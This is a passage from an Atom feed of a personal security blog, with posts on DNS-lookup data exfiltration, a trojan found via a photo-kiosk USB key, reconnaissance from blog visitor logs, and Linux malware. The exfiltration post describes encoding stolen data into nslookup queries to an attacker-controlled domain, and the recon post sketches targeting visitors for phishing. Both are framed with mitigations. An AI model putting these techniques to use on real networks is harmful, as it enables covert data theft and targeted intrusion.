<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-7184718389860127472</id><updated>2012-03-18T18:30:54.547+11:00</updated><category term='linux'/><category term='future'/><category term='Kids'/><category term='ssig'/><category term='DNSSEC'/><category term='DNS'/><category term='social engineering'/><category term='funny'/><category term='web'/><category term='vmware'/><category term='security'/><category term='apple'/><category term='kaminsky'/><category term='malware'/><category term='Jeff'/><category term='Sydney'/><category term='ESX'/><category term='autorun'/><category term='cloud'/><category term='virgin'/><category term='general'/><category term='Politics'/><category term='NAT'/><category term='exfiltration'/><category term='Australia'/><category term='iphone'/><category term='web-security'/><category term='physical'/><category term='reconnisance'/><category term='ruxcon'/><category term='Availability'/><category term='Conroy'/><category term='team-cymru'/><category term='darknet'/><category term='Altassian'/><category term='Security group'/><category term='ssl'/><category term='virus'/><category term='microsoft'/><category term='asp.net'/><category term='proxies'/><category term='Apache'/><category term='XSS'/><category term='conferences'/><category term='wanderings'/><category term='rant'/><title type='text'>Morgan's Security Blog</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://security.morganstorey.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' 
href='http://www.blogger.com/feeds/7184718389860127472/posts/default'/><link rel='alternate' type='text/html' href='http://security.morganstorey.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Morgan Storey</name><uri>http://www.blogger.com/profile/00188175933427899596</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>24</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-7184718389860127472.post-2643559263341872642</id><published>2012-01-19T17:55:00.000+11:00</published><updated>2012-01-19T17:55:00.180+11:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='exfiltration'/><category scheme='http://www.blogger.com/atom/ns#' term='proxies'/><title type='text'>Easy data exfiltration</title><content type='html'>I had this thought last night as I was falling asleep, and I realise it has probably already been discussed, but I will explain how easy it is to do and how hard it is for existing detections to catch.&lt;br /&gt;So my idea is basic data exfiltration via DNS lookups. Say you are sitting on an internal machine, logged on as a local user through some exploit via a boot disk or whatnot. You probably don't have internet access and you can't install a tunnelling tool, and you don't want to set off the machine's local HIDS by plugging in an unknown USB stick, so what do you do?&lt;br /&gt;Well, suppose you already have a DNS server running on a server you control, pre-set up for something like &lt;a href='http://analogbit.com/tcp-over-dns_howto'&gt;DNS tunnelling&lt;/a&gt;, or just legitimately resolving your own domains. 
On that existing DNS server you need to turn on verbose logging for one of your subdomains; this is pretty easy to do on BIND or even in the Windows DNS server. Then simply encode the data on the local machine any way you want, or if you can't encode it, don't, and just do an nslookup of data.sub.mydomain.com. Bear in mind the whole lookup can't be longer than 255 characters and each subdomain label can be 63 characters tops, so if you need to use some special characters you will need to either encode in base32 or use some system in your head.&lt;br /&gt;&lt;br /&gt;Mitigation: Do your client machines really need to resolve every site? Surely they are going through a proxy or application-aware firewall that can do the DNS lookups for them. The issue of course with this is that most networks now use DNS to resolve internal services, and usually the DNS servers that service these requests are allowed to go to the internet in some way, and the proxies or firewalls refer back to these internal DNS servers as they would also point to resources the proxies need, like authentication. The only suggestion then is to split your DNS server infrastructure up more finely: specific internal DNS servers that are allowed to do lookups to both the internal DNS servers and the wider internet, but the only device internally that is allowed to reach these is the proxy server. 
Of course, depending on the way your proxy server works, it may not wait for the client to be authenticated before it does a lookup, so the lookups could simply be proxied through the compromised machine's web browser that is connected to the proxy.</content><link rel='replies' type='application/atom+xml' href='http://security.morganstorey.com/feeds/2643559263341872642/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7184718389860127472&amp;postID=2643559263341872642' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/2643559263341872642'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/2643559263341872642'/><link rel='alternate' type='text/html' href='http://security.morganstorey.com/2012/01/easy-data-exfiltration.html' title='Easy data exfiltration'/><author><name>Morgan Storey</name><uri>http://www.blogger.com/profile/00188175933427899596</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7184718389860127472.post-7702388776816239278</id><published>2011-02-21T22:34:00.000+11:00</published><updated>2011-02-21T22:34:27.342+11:00</updated><title type='text'>Adobe and FileOpen pain</title><content type='html'>Not really a 100% IT security post, but Fiona had an issue getting a particular site's print functionality to work on her Ubuntu laptop. It seemed to "print" by opening a PDF that was secured in some fashion. 
Having a look at the error led nowhere; it was something like "could not open plugin". Having a look at the source etc. didn't give any help, and there was no help page that Fiona could find on the site.&lt;br /&gt;I resorted to trying to open the files with Windows, and bam, it tried to install a plugin called FileOpen. I found there was a Linux version of FileOpen &lt;a href="http://plugin.fileopen.com/all.aspx"&gt;here&lt;/a&gt;.&lt;br /&gt;Excellent, a Linux version. I downloaded it and ran the installer shell script, and it errored out as I had Adobe Reader 9.3 installed, the latest. Looking in the script, it had a check for the version of Adobe Reader installed; it only checks for 7 or 8, else fail. Googling led me to a recipe site's support page with posts from back in 2008 with someone complaining that Adobe 9 wasn't supported; the recipe site had started to ditch FileOpen as the support request hadn't been fixed to support Adobe 9. The main reason I am posting this is to help others in this predicament.&lt;br /&gt;It was important I get the site to work, so I assured Fiona that Windows was not the answer.&lt;br /&gt;I ran the following (as I had installed it manually from a deb from Adobe, just in case it was an old version issue): &lt;i&gt;sudo sh /opt/Adobe/Reader9/bin/UNINSTALL&lt;/i&gt;&lt;br /&gt;Then I managed to download an older version from here &lt;a href="http://ardownload.adobe.com/pub/adobe/reader/unix/8.x/8.1.1/enu/AdobeReader_enu-8.1.1-1.i386.deb"&gt;http://ardownload.adobe.com/pub/adobe/reader/unix/8.x/8.1.1/enu/AdobeReader_enu-8.1.1-1.i386.deb&lt;/a&gt; and installed it, then ran the FileOpen shell installer and all was good; the site worked and all was happy with the world.&lt;br /&gt;Just posting this for anyone else who has the issue.</content><link rel='replies' 
type='application/atom+xml' href='http://security.morganstorey.com/feeds/7702388776816239278/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7184718389860127472&amp;postID=7702388776816239278' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/7702388776816239278'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/7702388776816239278'/><link rel='alternate' type='text/html' href='http://security.morganstorey.com/2011/02/adobe-and-fileopen-pain.html' title='Adobe and FileOpen pain'/><author><name>Morgan Storey</name><uri>http://www.blogger.com/profile/10406049887224934659</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://2.bp.blogspot.com/_ZSml_pad8cA/SVXz5SBZJeI/AAAAAAAAAAM/bElLbMvv9O0/S220/sec.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7184718389860127472.post-5741097884229348051</id><published>2010-09-26T23:30:00.001+10:00</published><updated>2010-09-26T23:38:32.214+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='web-security'/><category scheme='http://www.blogger.com/atom/ns#' term='asp.net'/><category scheme='http://www.blogger.com/atom/ns#' term='web'/><category scheme='http://www.blogger.com/atom/ns#' term='virgin'/><title type='text'>Definitely not outage Virgins</title><content type='html'>So in case you haven't heard, an international budget airline here in Australia has had a major computer issue; see &lt;a href="http://www.smh.com.au/travel/travel-news/computer-glitch-causes-virgin-blue-delays-20100926-15s0k.html"&gt;here&lt;/a&gt;.&lt;br /&gt;By the sounds of it their outsourced service provider doesn't have redundant kit, as they couldn't simply fail over. 
But it gets worse: currently, going to https://book.virginblue.com.au/FlightInfo.aspx or https://book.virginblue.com.au leaks a lot of information, including a nice juicy standard ASP.NET error page of the type that the recently discussed ASP.NET padding oracle attack can make great use of; see &lt;a href="http://threatpost.com/en_us/blogs/new-crypto-attack-affects-millions-aspnet-apps-091310?utm_source=Threatpost&amp;amp;utm_medium=Tabs&amp;amp;utm_campaign=Today%27s+Most+Popular"&gt;here&lt;/a&gt;.&lt;br /&gt;Ouch and double ouch. Oh, and we hear this is not the first outage they have had in as many months...</content><link rel='replies' type='application/atom+xml' href='http://security.morganstorey.com/feeds/5741097884229348051/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7184718389860127472&amp;postID=5741097884229348051' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/5741097884229348051'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/5741097884229348051'/><link rel='alternate' type='text/html' href='http://security.morganstorey.com/2010/09/definately-not-outage-virgins.html' title='Definitely not outage Virgins'/><author><name>Morgan Storey</name><uri>http://www.blogger.com/profile/10406049887224934659</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' 
src='http://2.bp.blogspot.com/_ZSml_pad8cA/SVXz5SBZJeI/AAAAAAAAAAM/bElLbMvv9O0/S220/sec.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7184718389860127472.post-6524443508670832970</id><published>2010-07-25T20:33:00.000+10:00</published><updated>2010-07-25T20:33:02.019+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='reconnisance'/><title type='text'>passive recon on valued targets</title><content type='html'>So there was a bit of a flash in the pan recently, when my post on a simple autorun virus exploded after I notified Patrick Gray of the Risky Business podcast and he blogged it, and then ZDNet, Lifehacker and Slashdot (cue O Fortuna) picked it up. I am now even listening to the Risky Business podcast episode where I get a mention.&lt;br /&gt;Needless to say I got a lot of traffic (not a tonne; maybe the Slashdot effect is waning). A majority came from home users; interestingly a few had Firefox with Java turned off, and these showed up in extremetracker (I used them for a while, and they still have some value obviously). Those that didn't showed up in Google Analytics.&lt;br /&gt;I am a big fan of NoScript, so it seems I am not alone.&lt;br /&gt;Before I get on to my main point I feel I need to argue some points.&lt;br /&gt;First, Lifehacker seemed to allude to the USB key being infected from my home system or in some other way. This is simply untrue. This is a Windows virus, thus a Windows binary, which simply won't run on Linux, so there is no way to get infected there, and that was the last system it was plugged into, with everything on it deleted to make way for the small collection of photos. 
The other point is the investigation I did: our receipt showed a time of 2:35pm (I have already given the job number to BigW for their investigation team), and the virus folder's creation time (and that of the files inside) was 2:24pm on the same day as the receipt.&lt;br /&gt;On to the main point.&lt;br /&gt;Of the total ~2000 hits, there were some interesting and funny ones. There were the obligatory hits from Woolworths, BigW’s parent company, then the funny ones from Coles (their biggest competitor) and Kodak (the kiosks are Fujifilm). Then came the interesting ones, obviously driven from the Slashdot post: some hits from government organisations, some from big military complexes and security agencies the world over.&lt;br /&gt;The point of this post is to point out what kind of information these different public and private companies exposed. Obviously first off the bat, and something I thought of but my boss put eloquently into words: “Why do so many of these organisations have such telling reverse DNS records or IP block records?” Why indeed. I am not going to name names, but, using the ones I have already named: Woolworths' block was registered to Woolworths Limited.&lt;br /&gt;The next point, which concerns me more, is the other data that leaked out. I have their external IP, OK that’s not really much, but also their browser version (a lot of IE6 out there, people; have you learned nothing from the Google breach?), their connection speed, OS, etc. This could lead to someone simply writing a decent tech article, getting Slashdotted, then watching a list of targets stream in, doing a bit of Google digging to find an employee in said companies' email address/LinkedIn/Facebook, and sending them an email pointing to a follow-up post with a nice 0-day with remote code to install custom malware: some good reconnaissance on the most valuable (techie) targets. Usually you can assume the techies are running the latest software in the company, so if you see IE6 you have hit pay dirt, and if you see Mozilla 1.0, woo. 
You can even look for outdated OSes with unpatched vulnerabilities; there were a couple of Windows 98 and Windows 2000 hits. Oh, and to that OS/2 Warp 4 user that hit the site (if it wasn’t forged), both my apologies and respect...&lt;br /&gt;So from this I would think maybe everyone should change their proxies to use a different IP out of their block that is not registered to their company name, with no reverse DNS, and, you know, update your browser and OS once in a while, or change what your browser reports itself as to a different browser.</content><link rel='replies' type='application/atom+xml' href='http://security.morganstorey.com/feeds/6524443508670832970/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7184718389860127472&amp;postID=6524443508670832970' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/6524443508670832970'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/6524443508670832970'/><link rel='alternate' type='text/html' href='http://security.morganstorey.com/2010/07/passive-recon-on-valued-targets.html' title='passive recon on valued targets'/><author><name>Morgan Storey</name><uri>http://www.blogger.com/profile/10406049887224934659</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' 
src='http://2.bp.blogspot.com/_ZSml_pad8cA/SVXz5SBZJeI/AAAAAAAAAAM/bElLbMvv9O0/S220/sec.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7184718389860127472.post-9205960700897859744</id><published>2010-07-04T18:43:00.003+10:00</published><updated>2010-07-06T13:22:24.292+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='autorun'/><category scheme='http://www.blogger.com/atom/ns#' term='virus'/><title type='text'>Big Wirus</title><content type='html'>Gather round, everyone, for a tale of woe.&lt;br /&gt;So I loaned one of my many USB keys to Fiona to back up some of our photos to print at a BigW, Mt Gravatt to be precise. I had cleared everything off and handed it over to her to copy over the photos. We tried it in a local BigW (Mt Ommaney) on Saturday but couldn't find a station that worked properly; we managed to get a few photos printed, but Fiona kept the key to see if she could get them printed elsewhere.&lt;br /&gt;Off she trotted to Mt Gravatt BigW on Monday after she dropped the kids at kindy; she printed out the photos and thought nothing of it. Wednesday night I decided I should move my files back, I plugged the USB key in and noticed among the photos a hidden autorun.inf... Not usual for me to have left that there. A quick read of it in a text editor let me see it was trying to run RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013\driver.exe; scanning the file with ClamWin let me know it was &lt;a href="http://xml.ssdsandbox.net/index.php/78faaa98f49d3a2bb3c4030376b00673"&gt;Trojan.Poison-36&lt;/a&gt; (it goes by other names; Trojan.KillAV is Symantec's name), a nasty little phone-home trojan that was only discovered recently (9/06/10), and that uses the usual trick of infecting attached drives with an autorun.inf. 
It also then goes on to try and kill AV programs and then, once that is done, download other malware; see &lt;a href="http://www.bitdefender.com/VIRUS-1000499-en--Trojan.KillAV.PT.html"&gt;here&lt;/a&gt;.&lt;br /&gt;I was safe due to my self-inflicted draconian software restriction policy, and Fiona, who had plugged it in to her laptop, was safe due to it being an exe and her running Linux.&lt;br /&gt;So I notified BigW back on the 30th; I think for something so little, I have given them reasonable disclosure. It is something they could have designed against, by using a software restriction policy, or simply making the USB devices read-only via policy, or, hey, you know, antivirus that at least occasionally gets updated...&lt;br /&gt;I was and still am tempted to put my own little exe and autorun on a key to see if the kiosks are still vulnerable, but Fiona has advised against it, my little voice of reason.&lt;br /&gt;My problem with this issue is that there seems to be little design that has gone into a system that thousands of people probably use a week, and little concern for users of these systems: how many people are going to get home and infect their systems, and how many are going to not realise it was due to the dodgy kiosk they used and then blame the internet, Microsoft, or their kids? I am not a big fan of misplaced blame.&lt;br /&gt;&lt;br /&gt;Not really much news here; viruses are a part of life. But with most modern USB keys no longer having the nice little feature of a read-only switch, there is little you can do to protect yourself. 
You could try having an autorun.inf on your key that is marked read-only; that may work unless the virus knows how to overwrite it.</content><link rel='replies' type='application/atom+xml' href='http://security.morganstorey.com/feeds/9205960700897859744/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7184718389860127472&amp;postID=9205960700897859744' title='9 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/9205960700897859744'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/9205960700897859744'/><link rel='alternate' type='text/html' href='http://security.morganstorey.com/2010/07/big-wirus.html' title='Big Wirus'/><author><name>Morgan Storey</name><uri>http://www.blogger.com/profile/10406049887224934659</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://2.bp.blogspot.com/_ZSml_pad8cA/SVXz5SBZJeI/AAAAAAAAAAM/bElLbMvv9O0/S220/sec.jpg'/></author><thr:total>9</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7184718389860127472.post-8160278782303190350</id><published>2010-04-27T18:29:00.002+10:00</published><updated>2010-04-27T18:29:00.365+10:00</updated><title type='text'>security</title><content type='html'>I am the first to admit I am a sad geek. When I saw this the other day it made me laugh, possibly a little too much: &lt;a href="http://abstrusegoose.com/262"&gt;http://abstrusegoose.com/262&lt;/a&gt;&lt;br /&gt;What follows is a computer security debate about a fictional character in a fictional universe; I apologise in advance. 
&lt;br /&gt;Now I have to debate this. I always thought of R2D2 as the ultimate in automated hacking: an AI that is constantly writing exploits; heck, he probably has a virtual Imperial system running in his hardware to throw test code at. That, and he had physical access to a data port, à la USB, so he may have known some nice little direct memory injections, or even a kind of side-channel attack if the system was one big computer (which it seems to be): he could have been detecting key inputs from other terminals via power fluctuations in the data port.&lt;br /&gt;If it was a network, he could have known some protocol vulnerability or remote code exec that the good old pompous "no one will be able to get to that vulnerable access port on our space station" Empire would not bother patching. Can you imagine the amount of patching the Empire would have to do, though?&lt;br /&gt;&lt;br /&gt;If we take the monolithic single-computer-per-vessel approach (which leaves no room for redundancy), you have at its peak 25,000 Star Destroyers, 12 Super Star Destroyers and around 3 million other vessels (TIE fighters, Corvettes, Gunships, Transports, and the Death Star). So let’s say 3 million huge computers that probably can't be patched while in service, so will only be patched when in for maintenance at a dock, leaving lots of time for vulnerabilities to be discovered, and vulnerabilities on a single monolithic computer with no segregation of duties would be awesome: initiate self-destruct, anyone?&lt;br /&gt;&lt;br /&gt;If we take the multi-computer networked approach (which seems more likely given what we know: that the hyperdrive computer needed time to spin up and that droids seem independent), a Star Destroyer had about 5000 members in its crew, and the Super Star Destroyer and Death Star about 300,000 crew; we will say the smaller craft had an average of 10 crew (TIE fighters, Corvettes, Gunships, and Transports). 
So that means a total number of service men and women of about 160 million. They probably work three 8-hour shifts a day, plus some to cover weekends, so maybe a quarter of those have actual workstations, but there would be servers and central computers, so say 80 million computers plus about 10 million network devices. It is near-on impossible to have 100% patch rollout on a network of that size; give someone physical access to that network and they will get in somewhere, especially if that someone is a precocious little blue and white droid.&lt;br /&gt;&lt;br /&gt;Sources: &lt;a href="http://starwars.wikia.com/"&gt;http://starwars.wikia.com&lt;/a&gt;</content><link rel='replies' type='application/atom+xml' href='http://security.morganstorey.com/feeds/8160278782303190350/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7184718389860127472&amp;postID=8160278782303190350' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/8160278782303190350'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/8160278782303190350'/><link rel='alternate' type='text/html' href='http://security.morganstorey.com/2010/04/security.html' title='security'/><author><name>Morgan Storey</name><uri>http://www.blogger.com/profile/10406049887224934659</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' 
src='http://2.bp.blogspot.com/_ZSml_pad8cA/SVXz5SBZJeI/AAAAAAAAAAM/bElLbMvv9O0/S220/sec.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7184718389860127472.post-1885836485762638367</id><published>2010-04-15T22:31:00.000+10:00</published><updated>2010-04-15T22:31:26.421+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XSS'/><category scheme='http://www.blogger.com/atom/ns#' term='Apache'/><category scheme='http://www.blogger.com/atom/ns#' term='Altassian'/><title type='text'>Atlassian and Apache are related?</title><content type='html'>A very good write-up of the impressive attack that was carried out on these two groups: &lt;a href="http://www.zdnet.com.au/hackers-use-atlassian-to-compromise-apache-339302448.htm"&gt;http://www.zdnet.com.au/hackers-use-atlassian-to-compromise-apache-339302448.htm&lt;/a&gt;&lt;br /&gt;It is good that this underlines the real power of an XSS; I have heard people dismiss XSS, and this will be good to pull out at times like that. But it wasn't just XSS, it was a co-ordinated multi-pronged attack. The work of real pros. Just goes to show that if someone wants in badly enough they will get in.&lt;br /&gt;I know some of the people at Atlassian and I would say that unfortunately they got attacked by a better opponent. No one is infallible. It is good, though, how Atlassian handled it and then how Apache handled the resultant attack. 
I would say Atlassian was the target because of the donation to Apache; it made them a target.&lt;br /&gt;&lt;br /&gt;Oh yeah, and I have said it before and I will say it again: I hate URL shortening services, they should all die in a fire. If Twitter wants to stick to the 140 characters (which is a good thing), move to putting URLs in the page as a simple HTML link that goes at the bottom, à la the way Facebook does it.</content><link rel='replies' type='application/atom+xml' href='http://security.morganstorey.com/feeds/1885836485762638367/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7184718389860127472&amp;postID=1885836485762638367' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/1885836485762638367'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/1885836485762638367'/><link rel='alternate' type='text/html' href='http://security.morganstorey.com/2010/04/altassian-and-apache-are-related.html' title='Atlassian and Apache are related?'/><author><name>Morgan Storey</name><uri>http://www.blogger.com/profile/10406049887224934659</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://2.bp.blogspot.com/_ZSml_pad8cA/SVXz5SBZJeI/AAAAAAAAAAM/bElLbMvv9O0/S220/sec.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7184718389860127472.post-2018474433460529512</id><published>2010-02-09T18:38:00.011+11:00</published><updated>2010-02-09T18:38:00.687+11:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ESX'/><category 
scheme='http://www.blogger.com/atom/ns#' term='cloud'/><category scheme='http://www.blogger.com/atom/ns#' term='future'/><category scheme='http://www.blogger.com/atom/ns#' term='apple'/><title type='text'>A bleak but bright future</title><content type='html'>So I was listening to &lt;a href="http://risky.biz/RB138"&gt;Dan Geer on the Risky Business podcast&lt;/a&gt; talk about the possible future of computing today while flicking through my RSS feed, and I came to a realisation.&lt;br /&gt;The future of computing is going to be bleak. But maybe good for our security.&lt;br /&gt;Dan was talking about the new iPad and existing single-purpose devices as being the new wave of computers. Think about it: a device that is so locked down and vendor locked-in that it is inherently secure due to that. Devices that are single-purpose; they don't and can't do everything your previous computer could. Think about it: a light and switch doesn't require updates or security patches. Its purpose is singular: provide light or not.&lt;br /&gt;These computers would do this as well: provide a game, information, or what have you. We are already here to some extent, with single-purpose computers plugged into or inside televisions, locked down to the way the vendor wants, not necessarily locked down enough, but regardless. They still have bugs, ways to circumvent the original intended operation, but generally speaking these bugs require the inclined to be in front of the device, not miles away in their parents' basement.&lt;br /&gt;Then while listening to this and pondering, I read another article about "cloud computing".&lt;br /&gt;So the future will be these big provided clouds, some to play games in, some for businesses, others for research and development: single-purpose environments abstracted away from even the technical users, who will use a single-purpose thin client to access these clouds.&lt;br /&gt;So on one front it sounds good: security and technicalities are abstracted away to an extent. 
On another front it means tinkering will be harder, with everything; technical people will actually be less technical than they are now. It will be a dumbing down all around.&lt;br /&gt;I have played with Amazon's Elastic Compute Cloud and Google App Engine, and I run a personal virtual server on my laptop and media centre as well as several different ones in production, so I can see the advantage for the moment, but they can pry my multi-purpose machines from my cold dead hands when the time comes.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7184718389860127472-2018474433460529512?l=security.morganstorey.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://security.morganstorey.com/feeds/2018474433460529512/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7184718389860127472&amp;postID=2018474433460529512' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/2018474433460529512'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/2018474433460529512'/><link rel='alternate' type='text/html' href='http://security.morganstorey.com/2010/02/bleak-but-bright-future.html' title='A bleak but bright future'/><author><name>Morgan Storey</name><uri>http://www.blogger.com/profile/10406049887224934659</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://2.bp.blogspot.com/_ZSml_pad8cA/SVXz5SBZJeI/AAAAAAAAAAM/bElLbMvv9O0/S220/sec.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7184718389860127472.post-9162625875730903325</id><published>2009-12-14T18:32:00.001+11:00</published><updated>2009-12-14T18:32:00.611+11:00</updated><category 
scheme='http://www.blogger.com/atom/ns#' term='rant'/><category scheme='http://www.blogger.com/atom/ns#' term='virus'/><category scheme='http://www.blogger.com/atom/ns#' term='malware'/><category scheme='http://www.blogger.com/atom/ns#' term='linux'/><title type='text'>Linux secure?</title><content type='html'>Oh my, read this: http://www.omgubuntu.co.uk/2009/12/malware-found-in-screensaver-for-ubuntu.html&lt;br /&gt;Of course this is just the beginning. I saw this in the early days of Windows: popularity means people want flashy yet lame screensavers, so they go a-hunting, see a banner ad flashing epileptically at them that tells them their search is over, click it, and install a new cursor theme (I hate these), a day-of-the-month screensaver, or a fancy toolbar that will let you know who is browsing your MyFaceTwitLinked page at any given time and also automatically installs thousands of other applications you may like; hiding in these are some nice little bots. Of course on install it asks them for their password, as it has to make system changes. It then puts a helper in root's crontab and adds a new init.d daemon to keep itself memory resident with its privileges elevated; heck, maybe it even replaces some frequently used binary that runs with elevated privileges, something like the syslog daemon or init, with one that checks all that other stuff is still good to go.&lt;br /&gt;Then Linux will have reached the popularity of Windows, and the weakest link will again be the user.&lt;br /&gt;So in my humorous little story above I am trying to point out that just because it is safe now doesn't mean it will be forever. Windows is less and less about worms that get in automatically without user intervention. Conficker was the last big one, and MS had a patch out before it hit, so it was only slow patching that really let it spread. 
The rest of the viruses seen are delivered along with innocuous-looking software or, at worst, by a drive-by download, where a page runs something in the background that takes advantage of a hole in Internet Explorer to install something; those particular drive-by downloads won't happen on Linux. But have a look at the top 15 most common attacks at http://www.net-security.org/secworld.php?id=8597 and you will see Linux and Macs are susceptible to the lot, through misconfiguration or user error.&lt;br /&gt;Don't get me wrong, I am a big Linux fan-boi. If I had it my way Windows would be the struggling niche, Linux would have 96% market share, BSD 2%, and Macs wouldn't exist :P I think the ideal behind Linux is very admirable and scientific. Linux builds on what has come before it (usually), and because what has come before is open and readable this is fairly easy. "If I have seen further, it is by standing on the shoulders of giants." Sir Isaac Newton. To not build on what has come before is to repeat your predecessors' mistakes.&lt;br /&gt;There will always be flaws, at least until we write code that can write its own code; that may eventually create something almost flawless, or one of its children will.&lt;br /&gt;I think Linux allows for greater security, but also greater insecurity. 
Security is not where open source's power lies; its power is in its flexibility.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7184718389860127472-9162625875730903325?l=security.morganstorey.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://security.morganstorey.com/feeds/9162625875730903325/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7184718389860127472&amp;postID=9162625875730903325' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/9162625875730903325'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/9162625875730903325'/><link rel='alternate' type='text/html' href='http://security.morganstorey.com/2009/12/linux-secure.html' title='Linux secure?'/><author><name>Morgan Storey</name><uri>http://www.blogger.com/profile/10406049887224934659</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://2.bp.blogspot.com/_ZSml_pad8cA/SVXz5SBZJeI/AAAAAAAAAAM/bElLbMvv9O0/S220/sec.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7184718389860127472.post-7410565729278708092</id><published>2009-11-17T21:50:00.004+11:00</published><updated>2009-11-17T22:17:19.005+11:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='virus'/><category scheme='http://www.blogger.com/atom/ns#' term='funny'/><category scheme='http://www.blogger.com/atom/ns#' term='iphone'/><category scheme='http://www.blogger.com/atom/ns#' term='apple'/><title type='text'>Rickrolling has gone viral again</title><content type='html'>Now this &lt;a 
